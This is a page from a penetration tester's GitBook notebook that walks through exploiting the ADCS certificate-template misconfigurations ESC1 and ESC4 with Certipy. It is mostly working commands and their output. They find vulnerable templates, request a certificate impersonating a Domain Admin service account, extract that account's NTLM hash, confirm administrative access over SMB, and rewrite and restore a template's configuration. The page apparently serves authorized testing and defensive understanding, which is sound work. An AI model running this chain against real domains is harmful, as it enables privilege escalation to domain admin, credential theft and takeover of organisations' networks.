0xPThree.gitbook.io
  • Network Services
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 23 - Telnet
      • 25, 465, 587 - SMTP(S)
      • 53 - DNS
      • 80, 443 - HTTP(S)
        • Frameworks
          • Drupal
          • Flask
          • Laravel
          • Tomcat
          • Werkzeug
        • Fuzzing
        • Grafana
        • Languages
          • PHP
        • WebDAV
        • Web Vulnerabilities
          • CloudFlare Bypass
          • Command Injection
          • CSTI
          • File Inclusion/Path Traversal
          • SQL Injection
          • SSI
          • SSTI
          • Upload bypass
          • XLST
          • XML Injection
      • 88 - Kerberos
      • 135, 593 - MSRPC
      • 139, 445 - SMB
      • 161, 162, 10161, 10162 - SNMP
      • 1433, 3306 - SQL
      • 2049 - NFS
      • 2375 - Docker
  • Active Directory
    • ADCS
    • DACL Abuse
      • AddMember
      • ForceChangePassword
      • Kerberoasting
      • ReadLAPSPassword
      • ReadGMSAPassword
      • Grant Ownership
      • Grant Rights
      • Logon Script
      • Rights on RODC object
    • Security groups
    • Misc
  • Coding Languages
    • Python
  • Exploits / PoC's
    • Ansible
      • Ansible AWX
    • Apache
      • HTTP Server - CVE-2021-41773
      • Struts - CVE-2024-53677 / S2-067
      • Tomcat - CVE-2020-1938 / CVE-2020-10487
      • Tomcat - CVE-2025-24813
    • Confluence - CVE-2023-22527
    • CUPS - CVE-2024-47***
    • D-Link
      • CVE-2020-29322
      • Decrypt firmware: DIR-X1560
    • Dmidecode - CVE-2023-30630
    • Erlang
      • OTP SSH - CVE-2025-32433
    • EternalBlue - MS17-010
    • Gitlab - CVE-2023-7028
    • Golang
      • mholt/archiver
        • CVE-2024-0406
        • CVE-2025-3445
    • Ivanti - CVE-2024-21893 / 21887
    • Jenkins - CVE-2024-23897
    • LXD group - N/A
    • nf_tables - CVE-2024-1086
    • NFS - N/A
    • Node
      • markdown-pdf - CVE-2023-0835
      • sanitize-html - CVE-2024-21501
    • Oracle
      • WebLogic - CVE-2018-2628
      • WebLogic - CVE-2019-2729
      • WebLogic - CVE-2023-21839
      • WebLogic - CVE-2024-20931
      • WebLogic - CVE-2024-21006
    • PHP
      • CVE-2024-4577
    • RunC
      • CVE-2022-0811
      • CVE-2024-21626
    • Snap - CVE-2019-7304
    • TP-Link - CVE-2024-5035
  • Hardware
    • Firmware
    • JTAG
    • SPI
    • UART
    • USB
  • Post Exploit
    • Compile payload
    • Obfuscation
    • Read VMDK files
    • Saved Credentials
      • Linux - Ansible AWX / Tower
      • Linux - Dell Networker
      • Windows - Mozilla Firefox
      • Windows - Notepad++
      • Windows - WinSCP
    • Session Hijack
    • Sniffing Passwords
    • Upgrade shell
    • VMware
      • Disk Encryption
      • LDAP Connection (SSO)
      • Restore VCSA Postgres Database
      • vCenter Forge SAML
      • Waiter Account Information
  • Development
    • Dnsmasq DHCP
    • Docker
      • Ansible AWX
      • Docker Compose
      • FirmAE - Emulate Firmware
      • Oracle WebLogic
      • Rocket.Chat
      • Tomcat
      • Vaultwarden
    • Harden Windows Host
    • HTTPS Proxy
    • Netplan + Networkd
    • SSL/TLS Certificates
  • TODO
Powered by GitBook
On this page
  • Identify templates
  • ESC1
  • Request new certificate
  • Verify certificate
  • ESC4
  • Download template
  • Verify templates
  • Restore template
  • Troubleshooting
  • Certificate request not supported (or similar)

Was this helpful?

  1. Active Directory

ADCS

Identify templates

$ certipy find -username 'user@domain.local' -password '[REDACTED]' -vulnerable -stdout
[...]
[*] Enumeration output:

Certificate Templates
    1
      Template Name				: VPNCert
      Display Name				: VPN Cert
      Certificate Authorities			: dc-root-ca
      Enabled					: True
[...]
      Permissions
        Enrollment Permissions
          Enrollment Rights			: DOMAIN.LOCAL\Domain Admins
						  DOMAIN.LOCAL\Domain Users
						  DOMAIN.LOCAL\Enterprise Admins
						  DOMAIN.LOCAL\Authenticated Users
        Object Control Permissions
          Owner					: S-1-5-21-XXXXXXXX-YYYYYYYYYY-ZZZZZZZZZZ-RID
          Write Owner Principals		: DOMAIN.LOCAL\Authenticated Users
[...]
          Write Dacl Principals			: DOMAIN.LOCAL\Authenticated Users
[...]
          Write Property Principals		: DOMAIN.LOCAL\Authenticated Users
[...]
    [!] Vulnerabilities
      ESC1					: 'DOMAIN.LOCAL\\Domain Users' and 'DOMAIN.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
      ESC4					: 'DOMAIN.LOCAL\\Authenticated Users' has dangerous permissions

ESC1

Request new certificate

For a easy win find a user that's a member of Domain Admins group and is not configured as a "Protected User". Using BloodHound the user SERVICEACCOUNT@DOMAIN.LOCAL meets these requirements.

$ certipy req -username 'user@domain.local' -password '[REDACTED]' -ca dc-root-ca -target dc.domain.local -template VPNCert -upn SERVICEACCOUNT@DOMAIN.LOCAL -sid 'S-1-5-21-XXXXXXXX-YYYYYYYYYY-ZZZZZZZZZZ-RID' -debug
[...]
[*] Got certificate with UPN 'SERVICEACCOUNT@DOMAIN.LOCAL'
[*] Certificate object SID is 'S-1-5-21-XXXXXXXX-YYYYYYYYYY-ZZZZZZZZZZ-RID'
[*] Saved certificate and private key to 'serviceaccount.pfx'

If you encounter any errors when requesting a new certificate see Troubleshooting below.

Verify certificate

After successfully requesting a certificate for SERVICEACCOUNT@DOMAIN.LOCAL verify authentication and privileges.

$ certipy auth -pfx serviceaccount.pfx
[...]
[*] Got hash for 'serviceaccount@domain.local': XXXXXXXXXXXXXXXXXXXXXXX:[REDACTED]

$ nxc smb dc.domain.local -U SERVICEACCOUNT -H XXXXXXXXXXXXXXXXXXXXXXX:[REDACTED] -d domain.local --shares
[...]
SMB        10.1.1.1    445    DC    [+] domain.local\SERVICEACCOUNT:[REDACTED] (Pwn3d!)

ESC4

Download template

In order to restore the certificate template once exploited, download the certificate with the -save-old flag. Certipy will automatically modify the vulnerable ESC4 template to ESC1.

$ certipy template -username 'user@domain.local' -password '[REDACTED]' -template VPNCert -save-old -debug
[...]
[*] Saved old configuration for 'VPNCert' to 'VPNCert.json'
[*] Updating certificate template 'VPNCert'
[...]
[*] Successfully updated 'VPNCert'

Verify templates

Verify that the modifications we're correct and the template is now also vulnerable to ESC1.

$ certipy find -username 'user@domain.local' -password '[REDACTED]' -vulnerable -stdout
[...]
[*] Enumeration output:

Certificate Templates
    1
      Template Name				: VPNCert
      Display Name				: VPN Cert
      Certificate Authorities			: dc-root-ca
      Enabled					: True
[...]
      Permissions
        Enrollment Permissions
          Enrollment Rights			: DOMAIN.LOCAL\Domain Admins
						  DOMAIN.LOCAL\Domain Users
						  DOMAIN.LOCAL\Enterprise Admins
						  DOMAIN.LOCAL\Authenticated Users
        Object Control Permissions
          Owner					: S-1-5-21-XXXXXXXX-YYYYYYYYYY-ZZZZZZZZZZ-RID
          Write Owner Principals		: DOMAIN.LOCAL\Authenticated Users
[...]
          Write Dacl Principals			: DOMAIN.LOCAL\Authenticated Users
[...]
          Write Property Principals		: DOMAIN.LOCAL\Authenticated Users
[...]
    [!] Vulnerabilities
      ESC1					: 'DOMAIN.LOCAL\\Domain Users' and 'DOMAIN.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
      ESC4					: 'DOMAIN.LOCAL\\Authenticated Users' has dangerous permissions

With the template also being vulnerable to ESC1, see Request new certificate in the ESC1 section above.

Restore template

Once exploited through ESC1 restore the template to it's original state.

$ certipy template -username 'user@domain.local' -password '[REDACTED]' -template VPNCert -configuration VPNCert.json -debug
[...]
[+] MODIFY_REPLACE:
[+]    pKICriticalExtensions: ...
[+]    msPKI-Entrollment-Flag: ...
[+]    msPKI-Certificate-Name-Flag: ...
[*] Successfully updated 'VPNCert'

Troubleshooting

Certificate request not supported (or similar)

If we're not able to request a new certificate and encounter the error "certificate request not supported", or similar, it might be a mismatch in the template when automatically modified ESC4 to ESC1. To find the mismatching values setup a lab environment with the same vulnerability and compare the vulnerable certificate (VPNCert) to your lab environment vulnerable certificate.

Make modifications accordingly and upload the new, modified, template modified.json.

$ cp VPNCert.json modified.json
$ certipy template -username 'user@domain.local' -password '[REDACTED]' -template VPNCert -configuration modified.json -debug
[...]
[+] MODIFY_REPLACE:
[+]    pKICriticalExtensions: ...
[+]    msPKI-Entrollment-Flag: ...
[+]    msPKI-Certificate-Name-Flag: ...
[*] Successfully updated 'VPNCert'

Last updated 6 months ago

Was this helpful?